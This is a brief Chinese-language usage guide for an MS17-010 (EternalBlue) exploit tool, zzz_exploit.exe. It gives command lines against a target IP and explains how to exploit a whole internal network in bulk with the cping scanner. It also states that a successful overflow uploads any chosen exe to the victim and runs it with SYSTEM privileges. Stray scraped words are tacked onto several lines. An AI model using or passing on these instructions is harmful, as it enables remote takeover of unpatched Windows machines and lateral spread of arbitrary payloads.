工具:k8增强版zzzpython
编译:pythongit
漏洞:MS17-010github
用法:工具
zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 exe参数
zzz_exploit.exe 192.11.22.82 exe参数 管道名blog
如exe启动参数为 m.exe -Start 实战命令为 zzz_exploit.exe 192.11.22.82 -Startget
内网批量it
可结合cping批量溢出内网,将名称改成smbcheck便可,但exe必须使用无参版。(其它工具也能够,提供个IP参数便可)编译
由于cping只会传IP进去,不会传其它参数。使用前需将任意exe更名为ma.datast
溢出成功会自动将exe传入目标机器,并以system权限启动exe程序。权限